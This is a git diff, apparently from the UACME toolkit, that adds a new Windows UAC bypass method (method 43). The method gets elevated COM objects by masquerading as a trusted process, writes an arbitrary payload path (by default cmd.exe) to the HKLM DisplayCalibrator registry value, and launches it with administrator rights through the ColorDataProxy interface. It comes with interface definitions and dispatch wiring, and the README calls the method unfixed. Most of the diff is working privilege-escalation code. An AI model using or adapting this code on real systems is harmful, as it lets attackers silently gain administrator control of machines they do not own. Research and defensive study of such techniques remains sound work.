diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index 7609aad..e5ea3ea 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index 4135187..8dcb35a 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/README.md b/README.md
index 1d012d9..e233572 100644
--- a/README.md
+++ b/README.md
@@ -353,6 +353,14 @@ Keys (watch debug output with dbgview or similar for more info):
* Works from: Windows 7 (7600)
* Fixed in: currently unavailable in preview builds of Windows 10 RS4
* How: Shell redesign
+43. Author: Oddvar Moe derivative
+ * Type: Elevated COM interface
+ * Method: IColorDataProxy, ICMLuaUtil
+ * Target(s): Attacker defined
+ * Component(s): Attacker defined
+ * Works from: Windows 7 (7600)
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index 8fb107b..7c90b2e 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h
index f4d83e4..45dc376 100644
--- a/Source/Akagi/consts.h
+++ b/Source/Akagi/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 2.82
+* VERSION: 2.84
*
-* DATE: 02 Nov 2017
+* DATE: 04 Nov 2017
*
* Global consts definition file.
*
@@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
+#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSC_SHELL L"Software\\Classes\\mscfile\\shell\\open\\command"
@@ -153,15 +154,19 @@
#define COR_PROFILER_PATH L"COR_PROFILER_PATH"
#define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING"
+#define T_CALIBRATOR_VALUE L"DisplayCalibrator"
+
//
//COM objects elevation.
//
+#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}"
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}"
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_CLSID_UninstallStringLauncher L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"
+#define T_IID_IColorDataProxy L"{0A16D195-6F47-4964-9287-9F4BAB6D9827}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
#define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"
diff --git a/Source/Akagi/methods/api0cradle.h b/Source/Akagi/methods/api0cradle.h
index 78b654d..d228525 100644
--- a/Source/Akagi/methods/api0cradle.h
+++ b/Source/Akagi/methods/api0cradle.h
@@ -4,9 +4,9 @@
*
* TITLE: API0CRADLE.H
*
-* VERSION: 2.79
+* VERSION: 2.83
*
-* DATE: 16 Aug 2017
+* DATE: 04 Nov 2017
*
* Prototypes and definitions for api0cradle method.
*
@@ -56,14 +56,19 @@ typedef struct ICMLuaUtilVtbl {
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
- _In_opt_ LPCTSTR lpParameters,
- _In_opt_ LPCTSTR lpDirectory,
- _In_ ULONG fMask,
- _In_ ULONG nShow
+ _In_opt_ LPCTSTR lpParameters,
+ _In_opt_ LPCTSTR lpDirectory,
+ _In_ ULONG fMask,
+ _In_ ULONG nShow
);
- HRESULT(STDMETHODCALLTYPE *Method8)(
- __RPC__in ICMLuaUtil * This);
+ HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
+ __RPC__in ICMLuaUtil * This,
+ _In_ HKEY hKey,
+ _In_opt_ LPCTSTR lpSubKey,
+ _In_opt_ LPCTSTR lpValueName,
+ _In_ LPCTSTR lpValueString
+ );
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
diff --git a/Source/Akagi/methods/cdproxy.h b/Source/Akagi/methods/cdproxy.h
new file mode 100644
index 0000000..e4c22d9
--- /dev/null
+++ b/Source/Akagi/methods/cdproxy.h
@@ -0,0 +1,82 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: CDPROXY.H
+*
+* VERSION: 2.83
+*
+* DATE: 04 Nov 2017
+*
+* Prototypes and definitions for ColorDataProxy method.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+typedef interface IColorDataProxy IColorDataProxy;
+
+typedef struct IColorDataProxyVtbl {
+
+ BEGIN_INTERFACE
+
+ HRESULT(STDMETHODCALLTYPE *QueryInterface)(
+ __RPC__in IColorDataProxy * This,
+ __RPC__in REFIID riid,
+ _COM_Outptr_ void **ppvObject);
+
+ ULONG(STDMETHODCALLTYPE *AddRef)(
+ __RPC__in IColorDataProxy * This);
+
+ ULONG(STDMETHODCALLTYPE *Release)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method1)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method2)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method3)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method4)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method5)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method6)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method7)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method8)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method9)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method10)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *Method11)(
+ __RPC__in IColorDataProxy * This);
+
+ HRESULT(STDMETHODCALLTYPE *LaunchDccw)(
+ __RPC__in IColorDataProxy * This,
+ _In_ HWND hwnd);
+
+ END_INTERFACE
+
+} *PIColorDataProxyVtbl;
+
+interface IColorDataProxy
+{
+ CONST_VTBL struct IColorDataProxyVtbl *lpVtbl;
+};
diff --git a/Source/Akagi/methods/fwcpllua.h b/Source/Akagi/methods/fwcpllua.h
index a5a8d2c..d9984b5 100644
--- a/Source/Akagi/methods/fwcpllua.h
+++ b/Source/Akagi/methods/fwcpllua.h
@@ -18,7 +18,6 @@
*******************************************************************************/
#pragma once
-
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c
index aff55fd..5123487 100644
--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
-* VERSION: 2.82
+* VERSION: 2.83
*
-* DATE: 02 Nov 2017
+* DATE: 04 Nov 2017
*
* Hybrid UAC bypass methods.
*
@@ -2182,3 +2182,120 @@ BOOL ucmFwCplLuaMethod(
return SUCCEEDED(r);
}
+
+/*
+* ucmDccwCOMMethod
+*
+* Purpose:
+*
+* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmDccwCOMMethod(
+ _In_opt_ LPWSTR lpszPayload
+)
+{
+ HRESULT r = E_FAIL;
+ BOOL bCond = FALSE;
+
+ LPWSTR lpBuffer = NULL;
+ SIZE_T sz = 0;
+
+ IID xIID_ICMLuaUtil;
+ IID xIID_IColorDataProxy;
+ ICMLuaUtil *CMLuaUtil = NULL;
+ IColorDataProxy *ColorDataProxy = NULL;
+
+ WCHAR szBuffer[MAX_PATH + 1];
+
+ do {
+
+ //
+ // Select payload.
+ //
+ if (lpszPayload != NULL) {
+ lpBuffer = lpszPayload;
+ }
+ else {
+ //no payload specified, use default cmd.exe
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
+ lpBuffer = szBuffer;
+ }
+
+ sz = _strlen(lpBuffer);
+ if (sz == 0)
+ break;
+
+ //
+ // Create elevated COM object for CMLuaUtil.
+ //
+ if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
+ break;
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_CMSTPLUA,
+ CLSCTX_LOCAL_SERVER,
+ &xIID_ICMLuaUtil,
+ &CMLuaUtil);
+
+ if (r != S_OK)
+ break;
+
+ if (CMLuaUtil == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ //
+ // Write new custom calibrator value to HKLM.
+ //
+ r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,
+ HKEY_LOCAL_MACHINE,
+ T_DISPLAY_CALIBRATION,
+ T_CALIBRATOR_VALUE,
+ lpBuffer);
+
+ if (FAILED(r))
+ break;
+
+ //
+ // Create elevated COM object for ColorDataProxy.
+ //
+ if (IIDFromString(T_IID_IColorDataProxy, &xIID_IColorDataProxy) != S_OK) {
+ break;
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_ColorDataProxy,
+ CLSCTX_LOCAL_SERVER,
+ &xIID_IColorDataProxy,
+ &ColorDataProxy);
+
+ if (r != S_OK)
+ break;
+
+ if (ColorDataProxy == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ //
+ // Run our "custom calibrator".
+ //
+ ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);
+
+ } while (bCond);
+
+ if (CMLuaUtil != NULL) {
+ CMLuaUtil->lpVtbl->Release(CMLuaUtil);
+ }
+
+ if (ColorDataProxy != NULL) {
+ ColorDataProxy->lpVtbl->Release(ColorDataProxy);
+ }
+
+ return SUCCEEDED(r);
+}
diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h
index d3672e9..48c9581 100644
--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
-* VERSION: 2.82
+* VERSION: 2.83
*
-* DATE: 02 Nov 2017
+* DATE: 04 Nov 2017
*
* Prototypes and definitions for hybrid methods.
*
@@ -111,3 +111,6 @@ BOOL ucmMethodCorProfiler(
BOOL ucmFwCplLuaMethod(
_In_opt_ LPWSTR lpszPayload);
+
+BOOL ucmDccwCOMMethod(
+ _In_opt_ LPWSTR lpszPayload);
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index fef2fd5..6e29f76 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
-* VERSION: 2.81
+* VERSION: 2.83
*
-* DATE: 28 Oct 2017
+* DATE: 04 Nov 2017
*
* UAC bypass dispatch.
*
@@ -53,7 +53,8 @@ UCM_API(MethodHakril);
UCM_API(MethodCorProfiler);
UCM_API(MethodCOMHandlers);
UCM_API(MethodCMLuaUtil);
-UCM_API(MethodFwCpl);
+UCM_API(MethodFwCplLua);
+UCM_API(MethodDccwCOM);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@@ -98,7 +99,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
- { MethodFwCpl, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE }
+ { MethodFwCplLua, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
+ { MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }
};
/*
@@ -776,7 +778,7 @@ UCM_API(MethodCMLuaUtil)
return ucmCMLuaUtilShellExecMethod(szBuffer);
}
-UCM_API(MethodFwCpl)
+UCM_API(MethodFwCplLua)
{
LPWSTR lpszPayload = NULL;
@@ -795,3 +797,23 @@ UCM_API(MethodFwCpl)
return ucmFwCplLuaMethod(lpszPayload);
}
+
+UCM_API(MethodDccwCOM)
+{
+ LPWSTR lpszPayload = NULL;
+
+ UNREFERENCED_PARAMETER(Method);
+ UNREFERENCED_PARAMETER(ExtraContext);
+ UNREFERENCED_PARAMETER(PayloadCode);
+ UNREFERENCED_PARAMETER(PayloadSize);
+
+ //
+ // Select target application or use given by optional parameter.
+ //
+ if (g_ctx.OptionalParameterLength == 0)
+ lpszPayload = NULL;
+ else
+ lpszPayload = g_ctx.szOptionalParameter;
+
+ return ucmDccwCOMMethod(lpszPayload);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 5cc0a85..7da719f 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
-* VERSION: 2.82
+* VERSION: 2.83
*
-* DATE: 02 Nov 2017
+* DATE: 04 Nov 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -61,7 +61,8 @@ typedef enum _UCM_METHOD {
UacMethodCorProfiler, //+
UacMethodCOMHandlers, //+
UacMethodCMLuaUtil, //+
- UacMethodFwCpl, //+
+ UacMethodFwCplLua, //+
+ UacMethodDccwCOM, //+
UacMethodMax
} UCM_METHOD;
@@ -99,6 +100,7 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
#include "apphelp.h"
#include "b33f.h"
#include "carberp.h"
+#include "cdproxy.h"
#include "comet.h"
#include "comfileop.h"
#include "enigma0x3.h"
diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c
index ffbd547..70934b2 100644
--- a/Source/Akagi/tests/test.c
+++ b/Source/Akagi/tests/test.c
@@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
-* VERSION: 2.82
+* VERSION: 2.83
*
-* DATE: 02 Nov 2017
+* DATE: 04 Nov 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
diff --git a/Source/Akagi/tests/test.h b/Source/Akagi/tests/test.h
index a80b24e..93588cf 100644
--- a/Source/Akagi/tests/test.h
+++ b/Source/Akagi/tests/test.h
@@ -20,6 +20,9 @@
typedef interface ITestInterface ITestInterface;
+typedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(
+ __RPC__in ITestInterface * This);
+
typedef struct ITestInterfaceVtbl {
BEGIN_INTERFACE
@@ -29,13 +32,17 @@ typedef struct ITestInterfaceVtbl {
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
+
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ITestInterface * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ITestInterface * This);
- HRESULT(STDMETHODCALLTYPE *Method1)(
+ MethodPfn a[200];
+
+
+/* HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
@@ -81,7 +88,8 @@ typedef struct ITestInterfaceVtbl {
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
- __RPC__in ITestInterface * This);
+ __RPC__in ITestInterface * This);*/
+
END_INTERFACE
} *PITestInterfaceVtbl;
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index 97c6819..c20ebd2 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -426,6 +426,7 @@
+
diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters
index a894fb7..8f0cc03 100644
--- a/Source/Akagi/uacme.vcxproj.filters
+++ b/Source/Akagi/uacme.vcxproj.filters
@@ -296,6 +296,9 @@
Header Files\methods
+
+ Header Files\methods
+
diff --git a/UACME.sha256 b/UACME.sha256
index dda77c1..bda3e8e 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,5 +1,5 @@
-04341ae85502f402ba09df680a59ad86edffb9e4d433b98d20bccbbfc74c7140 *Compiled\Akagi32.exe
-67f0ad13918572c2b163185f03eb14b169f37d7863a13aadd5d3b1cfe3ade2b9 *Compiled\Akagi64.exe
+5e2c78ab050bbb0390710df1766ca3431edb830d5c8bf552175b3b0b40dd3115 *Compiled\Akagi32.exe
+30344b2d6335bd92331779bb3927275b20090f472345282e1a6d1515e86a4886 *Compiled\Akagi64.exe
12d2396c78432f3a0bd6281b39f3f83bf5573825aac475c94edba4886fd73ece *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
cfab4c45f324596e4f9a6eabedec3d2c2867e03d122ddf4becdf8b50c1ec8026 *Source\uacme.sln
@@ -13,19 +13,19 @@ ef42ba52ea3b16d206ea6367b0311f544631d6f5b6110550facfc9954884a76b *Source\Akagi\b
3ee61cd0352be04ee3af1edb159ae094d4c9bcfe00db6f45c2479c965b98783e *Source\Akagi\bin64res.rc
5b746ce038ee93a1f99e423c0aa0d39976fce2dafd4e7d9d446ab6f0f0fb2c95 *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
-f696a00694bebf94b3210a26d77cc1157cebe2818fc679017db1a5333e21a127 *Source\Akagi\consts.h
+f12f0a7fc07640d44bc0517c4855708c7b72671f00e7846c65cbd10f34a001dc *Source\Akagi\consts.h
68a7f3e03ec247d54f8b4ae52012e69177dd05c4b608dd9ee3bbf75d49401577 *Source\Akagi\global.h
3d9da9b6f4f68d9140b4ec7c962b56206459c5bca98e1db1e584483524bee9ce *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-1f8ad6c4dd3f33f0c0277b823d0c5cb2e0413eef7b6b35df85da03018fb99e18 *Source\Akagi\Resource.rc
+9b42af1fbe881ecc8cd22cd4d37446e810485befa9365a62a031865a2e81e2d7 *Source\Akagi\Resource.rc
4ba63fffb2838c59534b66f6f4e5960ff8559be59a01597ad560dc2cdcee3dbb *Source\Akagi\sup.c
af229de9ed6dae7fe5364381ab3ac96e4ac0e9b6a8f42078259dbe8dbec2711d *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
-2eb157a5d218534435d07c9dddcdad303ef23b5757449f1629ba78bb0dbf9334 *Source\Akagi\uacme.vcxproj
-2b87dc9e056ad349cbd7a79ce043acf4fea771b05842ac7023f601c9b37ff6a6 *Source\Akagi\uacme.vcxproj.filters
+3a563ced011f65d84309ecac6e518560393a8b62f19ce8ef18d95bc9d8a34d22 *Source\Akagi\uacme.vcxproj
+5ead1ab3d46fd0e04779882dfb35df51c6ea51939fbac78b2a0d9ff12f713c85 *Source\Akagi\uacme.vcxproj.filters
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
@@ -42,12 +42,13 @@ cf5e43ec5d5acb53045e88d8e8a2a34e3b3a2fbbdb4acb4ca37eb1c3e7b1d3dd *Source\Akagi\b
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
63930fd4e5fa4e67ec923c88995362e4d91c4c7a66be1da26b57ec37d89f3e29 *Source\Akagi\methods\api0cradle.c
-6e5c157d02b69f573345bb460adf0032fa6fd9b5f7c390699995dbd3ab12a812 *Source\Akagi\methods\api0cradle.h
+a73b25f6f839f29dd91587e5b8c19ae707575f8791e3ef08dd262349a04c111a *Source\Akagi\methods\api0cradle.h
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
ff3430dee2f8043a4be9a1235a3baaedeeeeaec2a1befba068a46d9ef42f3c49 *Source\Akagi\methods\b33f.c
1ce892263ef00aa1ac52f365519e800d7ac4535ac55454f0c777b17033769d8c *Source\Akagi\methods\b33f.h
e374e07b617a16d72dd21de250e4611866b509de15715957bed018ea07db62c3 *Source\Akagi\methods\carberp.c
b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
+c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
@@ -56,15 +57,15 @@ b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\m
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
-c80a6ec7ce870c8df4b9e15783dc077945852f7e9c078b49ba2f95a86bd222d9 *Source\Akagi\methods\fwcpllua.h
+3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h
6e2608ff58c3f1777a1cb0464b896c99eefbf933db4a8ff4de3465b849e49e99 *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
b0c8e8e88559fdb6ce96d2404c56b0830976d5f5911b89425cc26f686f36f02f *Source\Akagi\methods\hakril.c
6f2e173a90393eec705ad558c22874dbd41c07a597eff3448165a4124aaa442b *Source\Akagi\methods\hakril.h
-f2fc69584696a2dfa052a6ff8650c715d526fc0b26258fe2f58c608f515f9a67 *Source\Akagi\methods\hybrids.c
-534912bb33311a4e4dc35c12abd7a24642aa9e2acd94e2cba4896d7ba277295f *Source\Akagi\methods\hybrids.h
-564fae5e3dee300847a3e0a09b24de853d8f510fc9dd0eb923a8fa2ec4dc80b4 *Source\Akagi\methods\methods.c
-26d1b8fa856522556923d329d3324e4bb8b7698b7b74447f1a3b06b4491013b1 *Source\Akagi\methods\methods.h
+9dd0de9e974824f28a6e02bfc3a6f37b5ac8edfa629fd87e2c4e1e73fa6c3c5f *Source\Akagi\methods\hybrids.c
+354e8ec194b93264c998e7a999cedb909f7481eb0c0a5843a1fc129084bc8934 *Source\Akagi\methods\hybrids.h
+b0eab04bb9fc3557270bf172429f21e41c20ee85d0f8b65989f1c06341bd9964 *Source\Akagi\methods\methods.c
+b9776680e0f2ba72eff2a02619aae2c27c5debf194c690edae447c7faf919092 *Source\Akagi\methods\methods.h
4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@@ -89,8 +90,8 @@ e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Akagi\m
604d1cdf45c5a95bc9cf1bbf39ca05ef83013541101d34971c5cd7577e3d5247 *Source\Akagi\minhook\hde\pstdint.h
43bf687a9fff071b5f46070db4d36c846f8e069cdc57485ee897c499aacdde23 *Source\Akagi\minhook\hde\table32.h
b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Akagi\minhook\hde\table64.h
-c3c98c9a4b43219bcd38bff7c21dd69af1e3c8912f338162e912ccabb495cff7 *Source\Akagi\tests\test.c
-9b0ef3097318c0876b569b64f7ecdee3bba0a189aa770887d0b825ff7adc8dfb *Source\Akagi\tests\test.h
+abf5350c10eedc9857741f0d221156007f3d78e283ae39a6421379685995c37c *Source\Akagi\tests\test.c
+1402f6f278457fdea7bdedb49785c74d775c625c425fc347ece6652940c65878 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
4581ed25d561afd247c01d71d13c698b79503357f16d4c18832e01c2381ce630 *Source\Akatsuki\Akatsuki.vcxproj
9b57b5d6ca1ca38eb87ba36e82595525c4ccec1069ee81f4b24c6809c5b979b8 *Source\Akatsuki\Akatsuki.vcxproj.filters